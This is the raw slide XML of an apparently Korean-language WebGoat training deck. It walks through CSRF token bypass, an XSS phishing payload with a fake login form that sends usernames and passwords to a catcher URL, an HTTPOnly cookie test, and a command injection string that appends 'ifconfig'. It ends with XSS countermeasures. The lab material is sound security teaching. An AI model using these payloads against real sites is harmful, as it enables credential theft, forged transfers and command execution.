            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>testFrame.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="http://server.csec.local:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>webgoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>attack?Screen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>XXX&amp;menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>YYY&amp;transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=5000" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>tokensuffix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}//Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>에서 불러온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값을 포함한 요청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불러오는 함수이다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0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099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CSRF Token By-Pass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291619"/>
            <a:ext cx="8535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form accept-charset='UNKNOWN' id='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>transferForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>' method='POST' action='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>attack?Screen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>XXX&amp;menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=YYY' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='application/x-www-form-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   &lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>' type='text' value='0'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   &lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>CSRFToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>' type='hidden' value='0'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   &lt;input type='submit'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;/form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비어있는 폼을 만들어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가 가능하도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>했을뿐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 기능적인 요소는 아니다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&lt;iframe   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="http://server.csec.local:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>webgoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>attack?Screen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>XXX&amp;menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>YYY&amp;transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=main"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onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="readFrame1();"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>   id="frame1" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>frameborder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="1" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>marginwidth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="0"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marginheight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="0" width="800" scrolling=yes height="300"&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;iframe id="frame2" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>frameborder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="1" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>marginwidth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="0"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marginheight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="0" width="800" scrolling=yes height="300"&gt;&lt;/iframe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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> = main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>으로 설정하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>토큰값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 불러오는 페이지를 띄우고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>으로 선언한다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85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Phishing With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&lt;/form&gt;&lt;script&gt;function hack(){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>XSSImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=new Image; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>XSSImage.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="http://localhost/WebGoat/catcher?PROPERTY=yes&amp;user="+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>document.phish.user.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> + "&amp;password=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>document.phish.pass.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> + ""; alert("Thank you for your information!. User Name = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>document.phish.user.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> + "Password = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>document.phish.pass.value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>);}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ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>피싱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 정보가 넘어올 스크립트 함수선언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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>script&gt;&lt;form name="phish"&gt;&lt;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&gt;&lt;HR&gt;&lt;H3&gt;This result needs login:&lt;/H3 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&gt;ID:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;&lt;input type="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>text“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ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>검색결과를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보기위해서는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로그인이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 필요하다는 가짜 메시지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name="user"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;Password:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;&lt;input type="password" name = "pass"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt;&lt;input type="submit" name="login" value="login" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>="hack()"&gt;&lt;/form&gt;&lt;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&gt;&lt;HR&gt;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ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>가짜 로그인 창에 들어온 정보는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hack()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>함수에 전달된다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위와 같은 코드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>검색창에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 넣을 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스크립트 언어가 작동한다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099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CSRF Token By-Pass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24488" y="1484784"/>
            <a:ext cx="27749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Your Order List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메일을</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>확인하</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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Amount Transferred : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>5000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이라는 메시지를 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>큰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>값을 받아와 자동으로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err="1" smtClean="0"/>
              <a:t>transferFunds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> = 5000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되었다는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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스테이지를 완료하기 위해서 한번 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가 필요하므로</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Submit Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>버튼을 한번 클릭한다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" y="1484784"/>
            <a:ext cx="6057304" cy="447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7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099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CSRF Token By-Pass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24488" y="2060848"/>
            <a:ext cx="2774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Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 통해서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 하게 되면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Congratulations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지와 함께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메뉴에서 초록색 체크박스가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>나타나는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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CSRF Token By-Pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Complete.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0" y="1916832"/>
            <a:ext cx="6014270" cy="368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3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HTTPOnly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Test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24488" y="2060848"/>
            <a:ext cx="27749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HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Test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HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 이용하여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스크립트언어에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>쿠키데이터에 접근이 불가능하도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>하는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 보여주는 예제이다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간단히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>No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 정보에 접근이 가능하고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>일땐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불가능하다는것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 확인하면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3258"/>
            <a:ext cx="5688632" cy="439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5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HTTPOnly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Test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890" y="2227766"/>
            <a:ext cx="2774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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>일때의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 Cookie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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>일때의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Write Cookie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HTTPOnly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접근이 가능하다는 것을 알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43429"/>
            <a:ext cx="41148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HTTPOnly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Test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24677" y="2147545"/>
            <a:ext cx="27749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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>일때의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 Cookie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Yes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일때의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Write Cookie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HTTPOnly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Yes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스크립트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>통한 접근이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>불</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가능하다는 것을 알 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HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Test Complete.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1170"/>
            <a:ext cx="44005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7" y="3158520"/>
            <a:ext cx="43243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HTTPOnly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Test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297804"/>
            <a:ext cx="4051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HTTPOnly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Yes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스크립트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>통한 접근이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>불</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>가능하다는 것을 알 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Congratulations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>메시지와 함께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초록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>색 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>체크박스가 생성되었다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HTTPOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Test Complete.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4624677" cy="377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5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원인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772816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웹페이지가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사용자에게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입력받은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데이터가 적절한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인코딩이나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필터링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없이 </a:t>
            </a:r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동적으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로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생성된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웹페이지에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포함되어 사용자에게 재전송 될 때 발생하며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공격자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클라이언트 측에서 실행되는 악성 스크립트 코드를 제어 할 수 있어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세션 가로채기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웹 사이트 변조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악의적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컨텐츠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삽입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피싱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스푸핑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등의 공격을 할 수 있다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일반적으로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HTTP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요청에 대해 동적으로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HTML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을 생성하는 어플리케이션이 공격대상이 되며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정적인 홈페이지는 이 문제가 발생하지 않는다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게시판이나 개인 정보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변경등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단문 이상의 입력이 가능한 부분에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&lt;script&gt;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태그 입력이 사용 가능할 경우 취약점이 존재한다고 판단한다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05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대책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772816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데이터가 보여지거나 저장되기 전에 길이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형태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문법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및 비즈니스 규칙에 대한 모든 입력 데이터를 검증하기 위해 표준 입력 값 검증 방식을 사용한다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입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력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값이 전달되기 전에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인코딩이나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암호화 하고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출력값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암호화를 명시한다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게시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판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운영상 필요한 경우 외에는 사용자가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HTML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포맷을 사용하지 못하도록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특수문자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예외 문자를 다른 문자로 대체한다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(EX: ASP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replace(), PHP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str_replace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(),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eregi_replace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(), JSP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replaceAll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특정 문자열에 대한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HTML encoding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을 수행하여 객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형태로 변경한다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(EX: ASP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Server.HTMLEncode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(), PHP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htmlspecialchars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Strip_tags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()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함수를 이용하여 문자열로부터 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HTML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태그와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PHP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태그 제거한다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HTTPOnly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Cookies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사용하여 클라이언트 측에서 쿠키에 접근하지 못하도록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84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881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297804"/>
            <a:ext cx="4051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Command Injection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말그대로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명령어 등의 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 통한 공격 방식이다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Paros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낚아채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Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>명령 사이에 운영체제 명령어를 삽입하여 작동하는지 증명하면 되는 문제이다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4548979" cy="415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7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881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2297804"/>
            <a:ext cx="2899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Trap Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 걸고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WebGoat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실행하면 명령 정보가 잡히게 되는데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사이에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삽입해보도록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가장 기본적인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명령어인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 한번 실행시켜보도록 하겠다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" y="1628800"/>
            <a:ext cx="5870254" cy="447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1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Phishing With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2482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2120" y="1916832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 슬라이드에서 작성한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스크립</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>코드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>검색창에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 입력하여 나온 결과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This Result Needs Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>이라는 메시지를 출력하며 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>로그인 창이 나타난다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4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881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1881766"/>
            <a:ext cx="2899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HelpFile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AccessControlMatrix.help&amp;SUBMIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>=View</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty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되어있는 값을</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Paros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>를 통해서 아래와 같이 변경한다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HelpFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>=AccessControlMatrix.help%22%26%22ifconfig&amp;SUBMIT=View</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>%22 = “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>%26 = &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>%22 = “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(Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 해줘야 작동함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" y="1628800"/>
            <a:ext cx="5870254" cy="447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881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" y="1412776"/>
            <a:ext cx="5834473" cy="476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1700808"/>
            <a:ext cx="2664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후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>, Paros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Trap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>을 풀고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를 클릭하면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Ifconfig</a:t>
            </a:r>
